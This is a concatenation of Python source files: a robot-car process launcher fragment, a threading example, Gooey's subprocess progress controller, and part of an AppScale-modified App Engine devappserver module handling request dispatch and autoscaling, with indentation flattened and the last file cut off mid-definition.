    AngularSpeed = Value('i', conf_angle_speed)  # shared between UI and motor
XSpeed = Value('i', conf_X_speed)
YSpeedChangeRate = Value('i', conf_Y_Change_speed)
AngleChangeRate = Value('i', conf_Angle_Change_speed)
CityList = Array('i', range(3)) # 1 2 3
Flag_Run = Array('i', [1] * 3)
    print("Starting initialization and diagnostics...")
init()
    print("Starting main program...")
ui_p = Process(target=showui, args=(CarStatus, LinerSpeed, AngularSpeed, XSpeed, YSpeedChangeRate, AngleChangeRate, CityList, Flag_Run))
ui_p.start()
cv_p = Process(target=cv, args=(img_res_q, XSpeed))
cv_p.start()
line_p = Process(target=line_run, args=(img_res_q, CarStatus, LinerSpeed, AngularSpeed, XSpeed, YSpeedChangeRate, AngleChangeRate))
line_p.start()
time.sleep(0.5)
control_p = Process(target=CarControlRun, args=(CarStatus,CityList,Flag_Run))
control_p.start()
ui_p.join()
cv_p.join()
line_p.join()
control_p.join()
|
thread-python.py
|
from threading import Thread
from time import sleep
def timer(t):
for i in range(t):
print(i)
sleep(1)
thread1 = Thread(target=timer, args=(7, ))
thread1.start()
thread2 = Thread(target=timer, args=(8, ))
thread2.start()
|
processor.py
|
import os
import re
import subprocess
import sys
from functools import partial
from threading import Thread
from gooey.gui import events
from gooey.gui.pubsub import pub
from gooey.gui.util.casting import safe_float
from gooey.gui.util.taskkill import taskkill
from gooey.util.functional import unit, bind
class ProcessController(object):
def __init__(self, progress_regex, progress_expr, hide_progress_msg,
encoding, shell=True):
self._process = None
self.progress_regex = progress_regex
self.progress_expr = progress_expr
self.hide_progress_msg = hide_progress_msg
self.encoding = encoding
self.wasForcefullyStopped = False
self.shell_execution = shell
def was_success(self):
self._process.communicate()
return self._process.returncode == 0
def poll(self):
if not self._process:
raise Exception('Not started!')
self._process.poll()
def stop(self):
if self.running():
self.wasForcefullyStopped = True
taskkill(self._process.pid)
def running(self):
return self._process and self.poll() is None
def run(self, command):
self.wasForcefullyStopped = False
env = os.environ.copy()
env["GOOEY"] = "1"
env["PYTHONIOENCODING"] = self.encoding
try:
self._process = subprocess.Popen(
command.encode(sys.getfilesystemencoding()),
stdout=subprocess.PIPE, stdin=subprocess.PIPE,
stderr=subprocess.STDOUT, shell=self.shell_execution, env=env)
except:
self._process = subprocess.Popen(
command,
stdout=subprocess.PIPE, stdin=subprocess.PIPE,
stderr = subprocess.STDOUT, shell = self.shell_execution, env=env)
t = Thread(target=self._forward_stdout, args=(self._process,))
t.start()
def _forward_stdout(self, process):
'''
Reads the stdout of `process` and forwards lines and progress
to any interested subscribers
'''
while True:
line = process.stdout.readline()
if not line:
break
_progress = self._extract_progress(line)
pub.send_message(events.PROGRESS_UPDATE, progress=_progress)
if _progress is None or self.hide_progress_msg is False:
pub.send_message(events.CONSOLE_UPDATE,
msg=line.decode(self.encoding))
pub.send_message(events.EXECUTION_COMPLETE)
def _extract_progress(self, text):
'''
Finds progress information in the text using the
user-supplied regex and calculation instructions
'''
# monad-ish dispatch to avoid the if/else soup
find = partial(re.search, string=text.strip().decode(self.encoding))
regex = unit(self.progress_regex)
match = bind(regex, find)
result = bind(match, self._calculate_progress)
return result
def _calculate_progress(self, match):
'''
Calculates the final progress value found by the regex
'''
if not self.progress_expr:
return safe_float(match.group(1))
else:
return self._eval_progress(match)
def _eval_progress(self, match):
'''
Runs the user-supplied progress calculation rule
'''
_locals = {k: safe_float(v) for k, v in match.groupdict().items()}
if "x" not in _locals:
_locals["x"] = [safe_float(x) for x in match.groups()]
try:
return int(eval(self.progress_expr, {}, _locals))
except:
return None
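# A minimal sketch (not part of the original module) of how a progress
# expression is evaluated: with a hypothetical regex capturing "done/total"
# and the expression "x[0] / x[1] * 100", the line "progress: 3/10" yields 30.
def _demo_progress_eval():
    controller = ProcessController(
        progress_regex=r'^progress: (\d+)/(\d+)$',
        progress_expr='x[0] / x[1] * 100',
        hide_progress_msg=False,
        encoding='utf-8')
    match = re.search(controller.progress_regex, 'progress: 3/10')
    return controller._eval_progress(match)  # -> 30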
|
module.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Manage the lifecycle of runtime processes and dispatch requests to them."""
import collections
import cStringIO
import functools
import httplib
import logging
import math
import os
import os.path
import random
import re
import string
import struct
import threading
import time
import urllib
import urlparse
import wsgiref.headers
from google.appengine.api import api_base_pb
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import appinfo
from google.appengine.api import request_info
from google.appengine.api.logservice import log_service_pb
from google.appengine.tools.devappserver2 import application_configuration
from google.appengine.tools.devappserver2 import blob_image
from google.appengine.tools.devappserver2 import blob_upload
from google.appengine.tools.devappserver2 import channel
from google.appengine.tools.devappserver2 import constants
from google.appengine.tools.devappserver2 import endpoints
from google.appengine.tools.devappserver2 import errors
from google.appengine.tools.devappserver2 import file_watcher
from google.appengine.tools.devappserver2 import go_runtime
from google.appengine.tools.devappserver2 import http_runtime_constants
from google.appengine.tools.devappserver2 import instance
from google.appengine.tools.devappserver2 import login
from google.appengine.tools.devappserver2 import php_runtime
from google.appengine.tools.devappserver2 import python_runtime
from google.appengine.tools.devappserver2 import request_rewriter
from google.appengine.tools.devappserver2 import runtime_config_pb2
from google.appengine.tools.devappserver2 import start_response_utils
from google.appengine.tools.devappserver2 import static_files_handler
from google.appengine.tools.devappserver2 import thread_executor
from google.appengine.tools.devappserver2 import url_handler
from google.appengine.tools.devappserver2 import util
from google.appengine.tools.devappserver2 import wsgi_handler
from google.appengine.tools.devappserver2 import wsgi_server
_LOWER_HEX_DIGITS = string.hexdigits.lower()
_UPPER_HEX_DIGITS = string.hexdigits.upper()
_REQUEST_ID_HASH_LENGTH = 8
_THREAD_POOL = thread_executor.ThreadExecutor()
_RESTART_INSTANCES_CONFIG_CHANGES = frozenset(
[application_configuration.NORMALIZED_LIBRARIES_CHANGED,
application_configuration.SKIP_FILES_CHANGED,
application_configuration.NOBUILD_FILES_CHANGED,
# The server must be restarted when the handlers change because files
# appearing in static content handlers make them unavailable to the
# runtime.
application_configuration.HANDLERS_CHANGED,
application_configuration.ENV_VARIABLES_CHANGED])
_REQUEST_LOGGING_BLACKLIST_RE = re.compile(
r'^/_ah/(?:channel/(?:dev|jsapi)|img|login|upload)')
# Fake arguments for _handle_script_request for request types that don't use
# user-specified handlers.
_EMPTY_MATCH = re.match('', '')
_DUMMY_URLMAP = appinfo.URLMap(script='/')
_SHUTDOWN_TIMEOUT = 30
def _static_files_regex_from_handlers(handlers):
patterns = []
for url_map in handlers:
handler_type = url_map.GetHandlerType()
if url_map.application_readable:
continue
if handler_type == appinfo.STATIC_FILES:
patterns.append(r'(%s)' % url_map.upload)
elif handler_type == appinfo.STATIC_DIR:
patterns.append('(%s%s%s)' % (url_map.static_dir.rstrip(os.path.sep),
re.escape(os.path.sep), r'.*'))
return r'^%s$' % '|'.join(patterns)
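# A minimal sketch (not part of the original module) of the shape of the
# pattern produced above: for a hypothetical static_files handler uploading
# "static/.*\.css" and a static_dir handler for "images", the combined regex
# matches paths belonging to either handler and nothing else.
def _demo_static_files_regex():
  pattern = r'^(static/.*\.css)|(images/.*)$'
  return (re.match(pattern, 'static/site.css') is not None,  # True
          re.match(pattern, 'js/app.js') is not None)        # False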
class InteractiveCommandError(errors.Error):
pass
class _ScriptHandler(url_handler.UserConfiguredURLHandler):
"""A URL handler that will cause the request to be dispatched to an instance.
This handler is special in that it does not have a working handle() method
since the Module's dispatch logic is used to select the appropriate Instance.
"""
def __init__(self, url_map):
"""Initializer for _ScriptHandler.
Args:
url_map: An appinfo.URLMap instance containing the configuration for this
handler.
"""
try:
url_pattern = re.compile('%s$' % url_map.url)
except re.error, e:
raise errors.InvalidAppConfigError(
'invalid url %r in script handler: %s' % (url_map.url, e))
super(_ScriptHandler, self).__init__(url_map, url_pattern)
self.url_map = url_map
def handle(self, match, environ, start_response):
"""This is a dummy method that should never be called."""
raise NotImplementedError()
class Module(object):
"""The abstract base for all instance pool implementations."""
_RUNTIME_INSTANCE_FACTORIES = {
'go': go_runtime.GoRuntimeInstanceFactory,
'php': php_runtime.PHPRuntimeInstanceFactory,
'python': python_runtime.PythonRuntimeInstanceFactory,
'python27': python_runtime.PythonRuntimeInstanceFactory,
}
def _create_instance_factory(self,
module_configuration):
"""Create an instance.InstanceFactory.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
Returns:
A instance.InstanceFactory subclass that can be used to create instances
with the provided configuration.
Raises:
RuntimeError: if the configuration specifies an unknown runtime.
"""
# TODO: a bad runtime should be caught before we get here.
if module_configuration.runtime not in self._RUNTIME_INSTANCE_FACTORIES:
raise RuntimeError(
'Unknown runtime %r; supported runtimes are %s.' %
(module_configuration.runtime,
', '.join(
sorted(repr(k) for k in self._RUNTIME_INSTANCE_FACTORIES))))
instance_factory = self._RUNTIME_INSTANCE_FACTORIES[
module_configuration.runtime]
return instance_factory(
request_data=self._request_data,
runtime_config_getter=self._get_runtime_config,
module_configuration=module_configuration)
def _create_url_handlers(self):
"""Constructs URLHandlers based on the module configuration.
Returns:
      A list of url_handler.URLHandlers that can handle requests as described
      in the given configuration.
"""
handlers = []
# Add special URL handlers (taking precedence over user-defined handlers)
url_pattern = '/%s$' % login.LOGIN_URL_RELATIVE
handlers.append(wsgi_handler.WSGIHandler(login.application,
url_pattern))
url_pattern = '/%s' % blob_upload.UPLOAD_URL_PATH
# The blobstore upload handler forwards successful requests back to self
handlers.append(
wsgi_handler.WSGIHandler(blob_upload.Application(self), url_pattern))
url_pattern = '/%s' % blob_image.BLOBIMAGE_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(blob_image.Application(), url_pattern))
url_pattern = '/%s' % channel.CHANNEL_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(channel.application, url_pattern))
url_pattern = '/%s' % endpoints.API_SERVING_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(
endpoints.EndpointsDispatcher(self._dispatcher), url_pattern))
found_start_handler = False
found_warmup_handler = False
# Add user-defined URL handlers
for url_map in self._module_configuration.handlers:
handler_type = url_map.GetHandlerType()
if handler_type == appinfo.HANDLER_SCRIPT:
handlers.append(_ScriptHandler(url_map))
if not found_start_handler and re.match('%s$' % url_map.url,
'/_ah/start'):
found_start_handler = True
if not found_warmup_handler and re.match('%s$' % url_map.url,
'/_ah/warmup'):
found_warmup_handler = True
elif handler_type == appinfo.STATIC_FILES:
handlers.append(
static_files_handler.StaticFilesHandler(
self._module_configuration.application_root,
url_map))
elif handler_type == appinfo.STATIC_DIR:
handlers.append(
static_files_handler.StaticDirHandler(
self._module_configuration.application_root,
url_map))
else:
assert 0, 'unexpected handler %r for %r' % (handler_type, url_map)
# Add a handler for /_ah/start if no script handler matches.
if not found_start_handler:
handlers.insert(0, _ScriptHandler(self._instance_factory.START_URL_MAP))
# Add a handler for /_ah/warmup if no script handler matches and warmup is
# enabled.
if (not found_warmup_handler and
'warmup' in (self._module_configuration.inbound_services or [])):
handlers.insert(0, _ScriptHandler(self._instance_factory.WARMUP_URL_MAP))
return handlers
def _get_runtime_config(self):
"""Returns the configuration for the runtime.
Returns:
A runtime_config_pb2.Config instance representing the configuration to be
passed to an instance. NOTE: This does *not* include the instance_id
field, which must be populated elsewhere.
"""
runtime_config = runtime_config_pb2.Config()
runtime_config.app_id = self._module_configuration.application
runtime_config.version_id = self._module_configuration.version_id
runtime_config.threadsafe = self._module_configuration.threadsafe or False
runtime_config.application_root = (
self._module_configuration.application_root)
if not self._allow_skipped_files:
runtime_config.skip_files = str(self._module_configuration.skip_files)
runtime_config.static_files = _static_files_regex_from_handlers(
self._module_configuration.handlers)
# AppScale: Pack both API ports into the same field.
if (self._external_api_port is not None and
self._module_configuration.runtime == 'python27'):
port_bytes = struct.pack('HH', self._api_port, self._external_api_port)
runtime_config.api_port = struct.unpack('I', port_bytes)[0]
else:
runtime_config.api_port = self._api_port
runtime_config.stderr_log_level = self._runtime_stderr_loglevel
runtime_config.datacenter = 'us1'
runtime_config.auth_domain = self._auth_domain
for library in self._module_configuration.normalized_libraries:
runtime_config.libraries.add(name=library.name, version=library.version)
for key, value in (self._module_configuration.env_variables or {}).items():
runtime_config.environ.add(key=str(key), value=str(value))
if self._cloud_sql_config:
runtime_config.cloud_sql_config.CopyFrom(self._cloud_sql_config)
if self._module_configuration.runtime == 'php':
if self._php_executable_path:
runtime_config.php_config.php_executable_path = (
self._php_executable_path)
runtime_config.php_config.enable_debugger = (
self._enable_php_remote_debugging)
if (self._python_config and
self._module_configuration.runtime.startswith('python')):
runtime_config.python_config.CopyFrom(self._python_config)
return runtime_config
def _maybe_restart_instances(self, config_changed, file_changed):
"""Restarts instances. May avoid some restarts depending on policy.
One of config_changed or file_changed must be True.
Args:
config_changed: True if the configuration for the application has changed.
file_changed: True if any file relevant to the application has changed.
"""
if not config_changed and not file_changed:
return
logging.debug('Restarting instances.')
policy = self._instance_factory.FILE_CHANGE_INSTANCE_RESTART_POLICY
assert policy is not None, 'FILE_CHANGE_INSTANCE_RESTART_POLICY not set'
with self._condition:
instances_to_quit = set()
for inst in self._instances:
if (config_changed or
(policy == instance.ALWAYS) or
(policy == instance.AFTER_FIRST_REQUEST and inst.total_requests)):
instances_to_quit.add(inst)
self._instances -= instances_to_quit
for inst in instances_to_quit:
inst.quit(allow_async=True)
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
self._maybe_restart_instances(
config_changed=bool(config_changes & _RESTART_INSTANCES_CONFIG_CHANGES),
file_changed=has_file_changes)
def __init__(self,
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
external_api_port=None):
"""Initializer for Module.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_port: The port that APIModule listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
      runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
        file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
external_api_port: An integer specifying the location of an external API
server.
"""
self._module_configuration = module_configuration
self._name = module_configuration.module_name
self._host = host
self._api_port = api_port
self._external_api_port = external_api_port
self._auth_domain = auth_domain
self._runtime_stderr_loglevel = runtime_stderr_loglevel
self._balanced_port = balanced_port
self._php_executable_path = php_executable_path
self._enable_php_remote_debugging = enable_php_remote_debugging
self._python_config = python_config
self._cloud_sql_config = cloud_sql_config
self._request_data = request_data
# _create_instance_factory() transitively calls _get_runtime_config, which
# uses self._allow_skipped_files.
self._allow_skipped_files = allow_skipped_files
self._instance_factory = self._create_instance_factory(
self._module_configuration)
self._dispatcher = dispatcher
self._max_instances = max_instances
self._automatic_restarts = automatic_restarts
self._use_mtime_file_watcher = use_mtime_file_watcher
if self._automatic_restarts:
self._watcher = file_watcher.get_file_watcher(
[self._module_configuration.application_root] +
self._instance_factory.get_restart_directories(),
self._use_mtime_file_watcher)
else:
self._watcher = None
self._handler_lock = threading.Lock()
self._handlers = self._create_url_handlers()
self._default_version_port = default_version_port
self._port_registry = port_registry
self._balanced_module = wsgi_server.WsgiServer(
(self._host, self._balanced_port), self)
self._quit_event = threading.Event() # Set when quit() has been called.
# AppScale: Keeps track of active requests in case of shutdown.
# Indicates that the instance should refuse future requests.
self.sigterm_sent = False
# Handles request count and sigterm flag mutations.
self.graceful_shutdown_lock = threading.Lock()
# Keeps track of how many requests the instance is serving.
self.request_count = 0
# End AppScale.
@property
def name(self):
"""The name of the module, as defined in app.yaml.
    This value will be constant for the lifetime of the module even if the
    module configuration changes.
"""
return self._name
@property
def ready(self):
"""The module is ready to handle HTTP requests."""
return self._balanced_module.ready
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on."""
assert self._balanced_module.ready, 'balanced module not running'
return self._balanced_module.port
@property
def host(self):
"""The host that the HTTP server(s) for this Module is listening on."""
return self._host
@property
def balanced_address(self):
"""The address of the balanced HTTP server e.g. "localhost:8080"."""
if self.balanced_port != 80:
return '%s:%s' % (self.host, self.balanced_port)
else:
return self.host
@property
def max_instance_concurrent_requests(self):
"""The number of concurrent requests that each Instance can handle."""
return self._instance_factory.max_concurrent_requests
@property
def module_configuration(self):
"""The application_configuration.ModuleConfiguration for this module."""
return self._module_configuration
@property
def supports_interactive_commands(self):
"""True if the module can evaluate arbitrary code and return the result."""
return self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
inst=None):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
raise NotImplementedError()
def _no_handler_for_request(self, environ, start_response, request_id):
"""Handle a HTTP request that does not match any user-defined handlers."""
self._insert_log_message('No handlers matched this URL.', 2, request_id)
start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ['The url "%s" does not match any handlers.' % environ['PATH_INFO']]
def _error_response(self, environ, start_response, status):
start_response('%d %s' % (status, httplib.responses[status]), [])
return []
# AppScale: Check if the instance should be shutting down before handling
# request.
def _handle_request(self, environ, start_response, **kwargs):
""" A _handle_request wrapper that keeps track of active requests.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
with self.graceful_shutdown_lock:
if self.sigterm_sent:
start_response('503 Service Unavailable',
[('Content-Type', 'text/plain')])
return ['This instance is shutting down']
self.request_count += 1
try:
return self._handle_request_impl(environ, start_response, **kwargs)
finally:
with self.graceful_shutdown_lock:
self.request_count -= 1
# End AppScale.
def _handle_request_impl(self, environ, start_response, inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen. Setting inst is not meaningful if the
request does not match a "script" handler.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
try:
environ['SERVER_PORT'] = environ['HTTP_HOST'].split(':')[1]
except IndexError:
scheme = environ['HTTP_X_FORWARDED_PROTO']
if scheme == 'http':
environ['SERVER_PORT'] = 80
else:
environ['SERVER_PORT'] = 443
if 'HTTP_HOST' in environ:
environ['SERVER_NAME'] = environ['HTTP_HOST'].split(':', 1)[0]
environ['DEFAULT_VERSION_HOSTNAME'] = '%s:%s' % (
environ['SERVER_NAME'], environ['SERVER_PORT'])
with self._request_data.request(
environ,
self._module_configuration) as request_id:
should_log_request = not _REQUEST_LOGGING_BLACKLIST_RE.match(
environ['PATH_INFO'])
environ['REQUEST_ID_HASH'] = self.generate_request_id_hash()
if should_log_request:
environ['REQUEST_LOG_ID'] = self.generate_request_log_id()
if 'HTTP_HOST' in environ:
hostname = environ['HTTP_HOST']
elif environ['SERVER_PORT'] == '80':
hostname = environ['SERVER_NAME']
else:
hostname = '%s:%s' % (environ['SERVER_NAME'], environ['SERVER_PORT'])
if environ.get('QUERY_STRING'):
resource = '%s?%s' % (urllib.quote(environ['PATH_INFO']),
environ['QUERY_STRING'])
else:
resource = urllib.quote(environ['PATH_INFO'])
email, _, _ = login.get_user_info(environ.get('HTTP_COOKIE', ''))
method = environ.get('REQUEST_METHOD', 'GET')
http_version = environ.get('SERVER_PROTOCOL', 'HTTP/1.0')
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice.start_request(
request_id=request_id,
user_request_id=environ['REQUEST_LOG_ID'],
ip=environ.get('REMOTE_ADDR', ''),
app_id=self._module_configuration.application,
version_id=self._module_configuration.version_id,
nickname=email.split('@', 1)[0],
user_agent=environ.get('HTTP_USER_AGENT', ''),
host=hostname,
method=method,
resource=resource,
http_version=http_version)
def wrapped_start_response(status, response_headers, exc_info=None):
response_headers.append(('Server',
http_runtime_constants.SERVER_SOFTWARE))
if should_log_request:
headers = wsgiref.headers.Headers(response_headers)
status_code = int(status.split(' ', 1)[0])
content_length = int(headers.get('Content-Length', 0))
logservice.end_request(request_id, status_code, content_length)
logging.info('%(module_name)s: '
'"%(method)s %(resource)s %(http_version)s" '
'%(status)d %(content_length)s',
{'module_name': self.name,
'method': method,
'resource': resource,
'http_version': http_version,
'status': status_code,
'content_length': content_length or '-'})
return start_response(status, response_headers, exc_info)
if (environ['REQUEST_METHOD'] in ('GET', 'HEAD', 'TRACE') and
int(environ.get('CONTENT_LENGTH') or '0') != 0):
# CONTENT_LENGTH may be empty or absent.
wrapped_start_response('400 Bad Request', [])
return ['"%s" requests may not contain bodies.' %
environ['REQUEST_METHOD']]
with self._handler_lock:
handlers = self._handlers
try:
request_url = environ['PATH_INFO']
if request_type in (instance.BACKGROUND_REQUEST,
instance.INTERACTIVE_REQUEST,
instance.SHUTDOWN_REQUEST):
app = functools.partial(self._handle_script_request,
url_map=_DUMMY_URLMAP,
match=_EMPTY_MATCH,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
for handler in handlers:
match = handler.match(request_url)
if match:
auth_failure = handler.handle_authorization(environ,
wrapped_start_response)
if auth_failure is not None:
return auth_failure
if isinstance(handler, _ScriptHandler):
app = functools.partial(self._handle_script_request,
url_map=handler.url_map,
match=match,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
else:
return handler.handle(match, environ, wrapped_start_response)
return self._no_handler_for_request(environ, wrapped_start_response,
request_id)
except StandardError, e:
logging.exception('Request to %r failed', request_url)
wrapped_start_response('500 Internal Server Error', [], e)
return []
def _async_shutdown_instance(self, inst, port):
_THREAD_POOL.submit(self._shutdown_instance, inst, port)
def _shutdown_instance(self, inst, port):
force_shutdown_time = time.time() + _SHUTDOWN_TIMEOUT
try:
environ = self.build_request_environ(
'GET', '/_ah/stop', [], '', '0.1.0.3', port, fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.SHUTDOWN_REQUEST)
logging.debug('Sent shutdown request: %s', inst)
except:
logging.exception('Internal error while handling shutdown request.')
finally:
time_to_wait = force_shutdown_time - time.time()
self._quit_event.wait(time_to_wait)
inst.quit(force=True)
def _insert_log_message(self, message, level, request_id):
logs_group = log_service_pb.UserAppLogGroup()
log_line = logs_group.add_log_line()
log_line.set_timestamp_usec(int(time.time() * 1e6))
log_line.set_level(level)
log_line.set_message(message)
request = log_service_pb.FlushRequest()
request.set_logs(logs_group.Encode())
response = api_base_pb.VoidProto()
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice._Dynamic_Flush(request, response, request_id)
@staticmethod
def generate_request_log_id():
"""Generate a random REQUEST_LOG_ID.
Returns:
A string suitable for use as a REQUEST_LOG_ID. The returned string is
variable length to emulate the production values, which encapsulate
the application id, version and some log state.
"""
return ''.join(random.choice(_LOWER_HEX_DIGITS)
for _ in range(random.randrange(30, 100)))
@staticmethod
def generate_request_id_hash():
"""Generate a random REQUEST_ID_HASH."""
return ''.join(random.choice(_UPPER_HEX_DIGITS)
for _ in range(_REQUEST_ID_HASH_LENGTH))
def set_num_instances(self, instances):
"""Sets the number of instances for this module to run.
Args:
instances: An int containing the number of instances to run.
"""
raise request_info.NotSupportedWithAutoScalingError()
def get_num_instances(self):
"""Returns the number of instances for this module to run."""
raise request_info.NotSupportedWithAutoScalingError()
def suspend(self):
"""Stops the module from serving requests."""
raise request_info.NotSupportedWithAutoScalingError()
def resume(self):
"""Restarts the module."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance_address(self, instance_id):
"""Returns the address of the HTTP server for an instance."""
return '%s:%s' % (self.host, self.get_instance_port(instance_id))
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
raise request_info.NotSupportedWithAutoScalingError()
@property
def supports_individually_addressable_instances(self):
return False
def create_interactive_command_module(self):
"""Returns a InteractiveCommandModule that can be sent user commands."""
if self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS:
return InteractiveCommandModule(self._module_configuration,
self._host,
self._balanced_port,
self._api_port,
self._auth_domain,
self._runtime_stderr_loglevel,
self._php_executable_path,
self._enable_php_remote_debugging,
self._python_config,
self._cloud_sql_config,
self._default_version_port,
self._port_registry,
self._request_data,
self._dispatcher,
self._use_mtime_file_watcher,
self._allow_skipped_files)
else:
raise NotImplementedError('runtime does not support interactive commands')
def build_request_environ(self, method, relative_url, headers, body,
source_ip, port, fake_login=False):
if isinstance(body, unicode):
body = body.encode('ascii')
url = urlparse.urlsplit(relative_url)
if port != 80:
host = '%s:%s' % (self.host, port)
else:
host = self.host
environ = {constants.FAKE_IS_ADMIN_HEADER: '1',
'CONTENT_LENGTH': str(len(body)),
'PATH_INFO': url.path,
'QUERY_STRING': url.query,
'REQUEST_METHOD': method,
'REMOTE_ADDR': source_ip,
'SERVER_NAME': self.host,
'SERVER_PORT': str(port),
'SERVER_PROTOCOL': 'HTTP/1.1',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.errors': cStringIO.StringIO(),
'wsgi.multithread': True,
'wsgi.multiprocess': True,
'wsgi.input': cStringIO.StringIO(body)}
if fake_login:
environ[constants.FAKE_LOGGED_IN_HEADER] = '1'
util.put_headers_in_environ(headers, environ)
environ['HTTP_HOST'] = host
return environ
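# Usage sketch (hedged; mirrors the internal callers such as _warmup and
# _shutdown_instance, with a hypothetical port value):
#   environ = module.build_request_environ(
#       'GET', '/_ah/warmup', [], '', '0.1.0.3', 8080, fake_login=True)
#   # environ now carries the fake admin/login headers plus the usual WSGI
#   # keys and can be passed directly to _handle_request.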
class AutoScalingModule(Module):
"""A pool of instances that is autoscaled based on traffic."""
# The minimum number of seconds to wait, after quitting an idle instance,
# before quitting another idle instance.
_MIN_SECONDS_BETWEEN_QUITS = 60
# The time horizon to use when calculating the number of instances required
# to serve the current level of traffic.
_REQUIRED_INSTANCE_WINDOW_SECONDS = 60
_DEFAULT_AUTOMATIC_SCALING = appinfo.AutomaticScaling(
min_pending_latency='0.1s',
max_pending_latency='0.5s',
min_idle_instances=1,
max_idle_instances=1000)
@staticmethod
def _parse_pending_latency(timing):
"""Parse a pending latency string into a float of the value in seconds.
Args:
timing: A str of the form 1.0s or 1000ms.
Returns:
A float representation of the value in seconds.
"""
if timing.endswith('ms'):
return float(timing[:-2]) / 1000
else:
return float(timing[:-1])
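# Parsing sketch for the '<n>s' / '<n>ms' forms accepted above
# (illustrative values only):
#   _parse_pending_latency('1000ms')  ->  1.0
#   _parse_pending_latency('0.1s')    ->  0.1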
@classmethod
def _populate_default_automatic_scaling(cls, automatic_scaling):
for attribute in automatic_scaling.ATTRIBUTES:
if getattr(automatic_scaling, attribute) in ('automatic', None):
setattr(automatic_scaling, attribute,
getattr(cls._DEFAULT_AUTOMATIC_SCALING, attribute))
def _process_automatic_scaling(self, automatic_scaling):
if automatic_scaling:
self._populate_default_automatic_scaling(automatic_scaling)
else:
automatic_scaling = self._DEFAULT_AUTOMATIC_SCALING
self._min_pending_latency = self._parse_pending_latency(
automatic_scaling.min_pending_latency)
self._max_pending_latency = self._parse_pending_latency(
automatic_scaling.max_pending_latency)
self._min_idle_instances = int(automatic_scaling.min_idle_instances)
self._max_idle_instances = int(automatic_scaling.max_idle_instances)
def __init__(self,
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
